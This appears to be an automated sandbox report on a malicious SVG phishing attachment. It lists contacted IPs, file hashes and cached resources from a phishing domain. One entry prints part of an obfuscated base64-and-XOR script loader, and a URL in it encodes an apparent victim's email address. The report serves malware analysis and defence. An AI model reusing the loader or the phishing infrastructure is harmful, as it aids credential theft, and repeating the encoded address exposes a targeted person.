                                                    		13335CLOUDFLARENETUSfalse
                                                    142.250.80.14
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    64.233.180.84
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    1.1.1.1
                                                    		unknownAustralia
                                                    		13335CLOUDFLARENETUSfalse
                                                    142.251.35.170
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    104.21.32.1
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    104.21.84.180
                                                    		m60ri.kdyukk.ruUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    142.250.80.99
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.250.81.227
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    18.164.124.110
                                                    		unknownUnited States
                                                    		3MIT-GATEWAYSUSfalse
                                                    142.250.72.99
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    104.26.0.100
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUSfalse

                                                    Private

                                                    IP
                                                    192.168.2.16
                                                    192.168.2.14

                                                    General Information

                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1647992
                                                    Start date and time:2025-03-25 13:22:46 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Sample name:Qvc_Audio-Play.0044.svg
                                                    Detection:MAL
                                                    Classification:mal100.phis.evad.winSVG@20/32@34/225
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .svg
                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 142.250.80.99, 142.251.40.174, 142.250.176.206, 64.233.180.84
                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: gt.prjnyvhqq.es

                                                    Created / dropped Files

                                                    Chrome Cache Entry: 102

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):35786
                                                    Entropy (8bit):5.058073854893359
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                    SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                    SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                    SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/abtGFSFdrsecd30
                                                    Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:

                                                    Chrome Cache Entry: 104

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):25216
                                                    Entropy (8bit):7.947339442168474
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F9A795E2270664A7A169C73B6D84A575
                                                    SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                    SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                    SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/ijjoQp1oxSOnXEcvEdrNB8yaA6DF8mn5FECCpjHp1oZF4pjgrN12205
                                                    Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#

                                                    Chrome Cache Entry: 105

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10017)
                                                    Category:downloaded
                                                    Size (bytes):10245
                                                    Entropy (8bit):5.437589264532084
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                    SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                    SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                    SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250325%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250325T122336Z&X-Amz-Expires=300&X-Amz-Signature=9b1147548c36b6c2cf31537e7e8afe11e5eb21dd7a39903e846b207ab537fc34&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                    Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.

                                                    Chrome Cache Entry: 107

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:0

                                                    Chrome Cache Entry: 108

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):36696
                                                    Entropy (8bit):7.988666025644622
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                    SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                    SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                    SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/GDSherpa-regular.woff
                                                    Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.

                                                    Chrome Cache Entry: 109

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                    Category:downloaded
                                                    Size (bytes):28584
                                                    Entropy (8bit):7.992563951996154
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:17081510F3A6F2F619EC8C6F244523C7
                                                    SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                    SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                    SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/GDSherpa-regular.woff2
                                                    Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..

                                                    Chrome Cache Entry: 110

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):892
                                                    Entropy (8bit):5.863167355052868
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:41D62CA205D54A78E4298367482B4E2B
                                                    SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                    SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                    SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/qrRFwXbevZEvnVMAiUx7UvsVvR0ghZ3dwRujkZwN45137
                                                    Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...

                                                    Chrome Cache Entry: 111

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):7390
                                                    Entropy (8bit):4.02755241095864
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                    SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                    SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                    SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/klnbyrX5mgR6oOR29lBToSlNE2NGVwxkoZOideivFRicbZu8Yg56170
                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

                                                    Chrome Cache Entry: 112

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (26765), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):26765
                                                    Entropy (8bit):5.114987586674101
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1A862A89D5633FAC83D763886726740D
                                                    SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                    SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                    SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/34r0UWURcdqG658918
                                                    Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go

                                                    Chrome Cache Entry: 113

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):1298
                                                    Entropy (8bit):6.665390877423149
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:32CA2081553E969F9FDD4374134521AD
                                                    SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                    SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                    SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/ijskoldCggu31f20b0CIcq30AhAYsKJqrz8ih0T8qdNzvqPbAxgvsbYab230
                                                    Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt

                                                    Chrome Cache Entry: 116

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (17089), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):22124
                                                    Entropy (8bit):5.927615342341465
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9E15FB6656241423BB950D1C7F9C05AF
                                                    SHA1:D6BB797F5589E9D6D277665DE3EE41C658B94174
                                                    SHA-256:F9B715084C14F69E3E186B1ADCFD0A6F51D848114596F7FA54211543F186F238
                                                    SHA-512:C5E46C5BB68F67053DC169ECE87E4D31C770328713F2E862C101BF69570F4DA5250E7B2A2ECCF513F4B6CC42510FE84668DFC267058E71ED5D45F29F8921DDE4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29t
                                                    Preview:<script>..function HseRPGQcAZ(BBveUomWcj, QGOnBBFDrC) {..let CTjdtRwEle = '';..BBveUomWcj = atob(BBveUomWcj);..let aHPgsieCKv = QGOnBBFDrC.length;..for (let i = 0; i < BBveUomWcj.length; i++) {.. CTjdtRwEle += String.fromCharCode(BBveUomWcj.charCodeAt(i) ^ QGOnBBFDrC.charCodeAt(i % aHPgsieCKv));..}..return CTjdtRwEle;..}..var rMQRMUAuVn = HseRPGQcAZ(`XkIyGB9BP2EHPQEMcwICRTsyTmBNUj4OEx8hMAEqEEh/CRlcZCsFOgdDKEdFH31vRGEPWD9EHEJpf0hgEVIjAwZFdUx+cxFSIwMGRWsyBixfEzkeAkE4e1tgAVU/AAUfKC0bOgZXPQsEVGUiGyJNUDsLDh4nKBY8TVIjEwZFJGwePE0Ff1tYAGQiBjYSRT5HHEJlLB0hTFsiSEgNZDIXPQtBJVR7O0ZLSDwBQzgaAg9GSxoqFREXHxhSPygbIUpQJQUUGWwgIxYFehZfHlUmLRoWOmMnCR8EeBsjBQlSPAZEaxMIEykqRjYORF0+GzN2UX08JB5TDDklLiV3JA4xCD8IPDdaeBkOBlMmEwIrGwQ3CTFZIyMaHRRTAihOVwgDARY6ayEwRHd7I0cGF1UJJBpSIAcaFTUEYSYbXT4YRjdTaxY8DHoICzcrOnsmIx9aOwg8PCxyOCsReAgAEwYhcDYORF0+GzN2UX08EgBoeQdELjUIJCMyASwIGQkLU2I8Rn4mCwcWNQQjIxxCBQIafyxyPDgAaHgXABU1BGEmG3cgGzEZUGsGX0ZlDC0OKyVnJDAueCQIGTsOVAY4AFV5dR0DIXM8DiEEISUzIxRTOCsZaxMbGC0MYCEjPkIFAh0OBXgS

                                                    Chrome Cache Entry: 73

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):1864
                                                    Entropy (8bit):5.222032823730197
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/klsu6d3zoH5wmy0peV2uToNijTGSfrLunny4LgpAlT3rGpdJZIfwx214
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

                                                    Chrome Cache Entry: 74

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):2905
                                                    Entropy (8bit):3.962263100945339
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FE87496CC7A44412F7893A72099C120A
                                                    SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                    SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                    SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/yzQ7WQ1WS103WLJUON9XEhz9rsLHCpu997FrOW4sdEIKab180
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.

                                                    Chrome Cache Entry: 75

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):4724541
                                                    Entropy (8bit):2.5839796656457863
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AA849F9614E090F7E5EBED754F83D3C2
                                                    SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                                                    SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                                                    SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                                                    Malicious:false
                                                    Reputation:unknown
